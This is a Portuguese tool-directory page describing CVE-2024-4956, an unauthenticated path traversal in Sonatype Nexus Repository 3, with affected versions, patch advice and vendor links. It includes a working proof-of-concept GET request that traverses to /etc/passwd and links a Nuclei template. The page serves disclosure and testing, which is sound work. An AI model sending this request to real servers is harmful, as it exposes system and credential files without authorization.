Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-4956 — Path Traversal Não Autenticado no Nexus Repository 3 | Kitploit
Ferramentas/GitHubGitHub/erickfernandox/cve-2024-4956
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHuberickfernandox/cve-2024-4956

CVE-2024-4956

Path Traversal Não Autenticado no Nexus Repository 3

Ver Repositório
3há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-4956 - Path Traversal Não Autenticado no Nexus Repository Manager 3

O Nexus Repository Manager é um gerenciador de repositórios que organiza, armazena e distribui artefatos necessários para o desenvolvimento.

Uma vulnerabilidade de path traversal foi descoberta no Nexus Repository 3, nas versões anteriores a 3.68.1. Essa vulnerabilidade permite que um atacante crie uma URL para baixar arquivos do sistema fora do escopo da aplicação Nexus Repository, sem qualquer autenticação. Isso representa um risco significativo, pois pode expor arquivos sensíveis do sistema e potencialmente comprometer a segurança do ambiente onde o Nexus Repository está instalado.

Recomenda-se atualizar o Nexus Repository para a versão 3.68.1 ou superior o mais rápido possível para mitigar essa vulnerabilidade.

Para mais informações e detalhes técnicos sobre a vulnerabilidade, consulte o seguinte link:

Referências:

  • https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16

Versões vulneráveis

A vulnerabilidade afeta as versões 3.0 a 3.68.0 do Sonatype Nexus Repository Manager.

Mitigação:

A atualização do Nexus Repository é a abordagem recomendada para eliminar essa vulnerabilidade. No entanto, opções de mitigação imediata estão disponíveis para implantações que não podem atualizar imediatamente:

Referências:

  • https://support.sonatype.com/hc/en-us/articles/29412417068819

PoC

root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

Com o PoC acima, é possível ver o arquivo /etc/passwd sendo acessado:

Template Nuclei

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml

Baixar ferramenta